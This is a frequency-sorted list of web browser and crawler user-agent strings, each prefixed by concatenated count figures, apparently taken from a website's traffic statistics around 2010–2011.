42214163Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
41824162Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
41514070Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
40433963Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
39143741Jyxobot/1
38853689Python-webchecker/1.32
38403761Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
37793766Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
37573628Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
37223679Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; SpamBlockerUtility 4.8.4; .NET CLR 1.1.4322)
37173708Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.4; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
36603469FAST MetaWeb Crawler (helpdesk at fastsearch dot com)
36473647Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)
36303525Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
36073585Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
35823438Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)
35723572Apple-PubSub/65.11
34543307Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
34203289Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
34033114Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
33373229Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)
33323079Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)
32763276Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=1942867011920659746)
32543254Baiduspider+(+http://www.baidu.jp/spider/)
31913045Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
31833183libwww-perl/5.803
30142887Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
29982975Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
28942743Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
27812766Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.5); InfoPath.1)
27392639Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729)
27272715msnbot/2.0b (+http://search.msn.com/msnbot.htm)._
26382416FAST-WebCrawler/3.8/Scirus (scirus-crawler@fast.no; http://www.scirus.com/srsapp/contactus/)
26342599Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; InfoPath.2)
25062485Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
24752331Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
24722425Mozilla/5.0 (compatible; SiteBot/0.1; +http://www.sitebot.org/robot/)
24632118Mozilla/5.0 (compatible; heritrix/1.14.3 +http://www.accelobot.com)
24582303Mozilla/5.0 (Windows NT 5.1; rv:2.0) Gecko/20100101 Firefox/4.0
24502450Sosospider+(+http://help.soso.com/webspider.htm)
24462407Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
24302411Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
24252222Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
23672367Mozilla/5.0 (compatible; Google Desktop)
23582344Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C)
23502231Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
23462345User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
23362251Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
23072307Apple-PubSub/65.12.1
22792261ia_archiver
22612109Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)
22141984Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
21982162Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322)
21862177Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://sp.ask.com/docs/about/tech_crawling.html)
21602160Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)
21451916Gigabot/3.0 (http://www.gigablast.com/spider.html)
21301964Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
21072107IRLbot/3.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)
21002087psbot/0.1 (+http://www.picsearch.com/bot.html)
20802060Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.5; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
20781961Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
20771961Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)
20751971Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12
20601946TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)
20581547Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
20531733Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
20461934Mozilla/4.0 (compatible;)
20232023Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)
20221929Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SearchToolbar 1.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BRI/1; .NET4.0C; .NET4.0E)
20111846findfiles.net/0.98 (Robot;test_robot@gmx-topmail.de)
20101973Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)
19981251Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 ( .NET CLR 3.5.30729)
19921911Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)
19891842Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
19871957Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1 ( .NET CLR 3.5.30729)
19631133Mozilla/5.0 (compatible; archive.org_bot/heritrix-1.15.4 +http://www.archive.org)
19621962Mozilla/5.0 (compatible; BecomeBot/3.0; +http://www.become.com/site_owners.html)
19221784Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 97780803; control/5.00158; 7869069703; 887800124803)
19201593IRP_edu_bot/Nutch-1.0-dev
19051891Mozilla/3.0 (compatible)
19041904Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)
18491808Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)
18421786Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
18381826Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
18311721Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
17801728Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322)
17401672Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
17251610Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
17171680Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
17051705Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
16991637Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
16871596Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
16751641Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)
16651656ichiro/2.0 (http://help.goo.ne.jp/door/crawler.html)
16641635Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9
16381602Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
16161484Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)
16111329Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
16081456Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
16011559Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9
1582926Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
15651530Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET4.0C; .NET4.0E)
15641449Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
15391481Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
15151430Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2)
15091509WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)
14781430Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729)
14761391Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)
14601451Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 8997073803; Service 2.00289)
14541403Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
14511268Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4
14441391Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
14281416W3C-checklink/4.3 [4.42] libwww-perl/5.803
14251371Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
14001182msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)
1390807Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
13881377Java/1.6.0_03
13851347Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729)
13661364Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0)
13441336Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; [xSP_2:10668b9963e3322796bd56166bb7c275_195]; 977904803)
13411307Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
13301286Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
13261241Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html
13251284Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 GTB7.1 ( .NET CLR 3.5.30729; .NET4.0E)
13171279Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
13151282Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; SV1)
13101276Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
13101258Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8
13091275Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
13031187Mozilla/4.0 (compatible; MSIE 6.0; Windows XP; KyoHTTP 1.1.13, http://www.LinkCheckerPro.com)
13031218ichiro/3.0 (http://help.goo.ne.jp/door/crawler.html)
13011252Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)
12981191Mozilla/5.0 (compatible; LiteFinder/1.0; +http://www.litefinder.net/about.html)
12951295Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )
12951295Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)
12901192Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2)
12861282Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
12691163Mozilla/5.0 (compatible; heritrix/1.12.0 +http://www.accelobot.com)
12651249Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
12641193Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
12591216Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
12541246Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
12241196Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322)
12171144Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620
12091181Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
11911102Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)
11911185Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SpamBlockerUtility 4.8.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
11891186Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322 yplus 4.1.00b)
11861186bzBot/0.5-dev (BusyBot Event Crawler; http://busytonight.com/bot.html; +)
11851185ichiro/4.0 (http://help.goo.ne.jp/door/crawler.html)
11841184Mozilla/4.0
11811168Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1)
11811170Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; .NET CLR 1.1.4322 yplus 5.1.02b)
11771103Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
11771128findfiles.net/0.96 (Robot;test_robot@gmx-topmail.de)
11741174Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)
11661165Atrax Solutions atraxbot/0.3; http://www.atraxsolutions.com/atraxbot
11621083Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
11621122Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-us) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
11601107Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)
1158998Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.11) Gecko/20080109 (Charlotte/0.9t; http://www.searchme.com/support/)
11561129Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
11471101Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
11341073Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
11261122Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322 yplus 4.1.00b)
11121005Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
11051075Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322)
11041002ConveraCrawler/0.9e (+http://www.authoritativeweb.com/crawl)
11011065Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)
11001024Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1
10941088Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322 yplus 4.1.00b)
10921073Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9
10841030Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
10771058Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
10681004Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6)
10671043Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
1067834Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C)
10601060Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;TencentTraveler)
1058909Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com,crawl@powerset.com]
1055975Mozilla/5.0 (iPad; U; CPU OS 3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/531.21.10
1051829Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19
10491029Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7
1045907Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
10441032Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
10401036Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)
1032856Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
10301019Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)
10210Googlebot-Image/1.0
1019968Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
10181014Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)
10141006Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322 yplus 5.1.02b)
1004977Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11
999997Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)
996892Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
996924Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
989989Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2; MS-RTC LM 8; MSOffice 12)
980980Internet Explorer 6.0
972968Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
961939Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
961961Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.2; MS-RTC LM 8; .NET CLR 2.0.50727; MSOffice 12)
958958Mozilla/5.0 (compatible; MJ12bot/v1.4.0; http://www.majestic12.co.uk/bot.php?+)
946928Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)
944924Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
940938MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
933932OmniExplorer_Bot/3.95 (+http://www.omni-explorer.com) WorldIndexer
928928DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo; +http://help.goo.ne.jp/help/article/1142/)
920880Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)
918905Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 (.NET CLR 3.5.30729)
915810Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
913829Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
912893Mozilla/4.0 (compatible; ICS)
910908Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
900809Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
896855Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)
893810Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
892790Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
881881Mozilla/3.0 (compatible; Indy Library)
876838Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
874845Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.6; (R1 1.6); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; InfoPath.2)
871813Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8
871815Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)
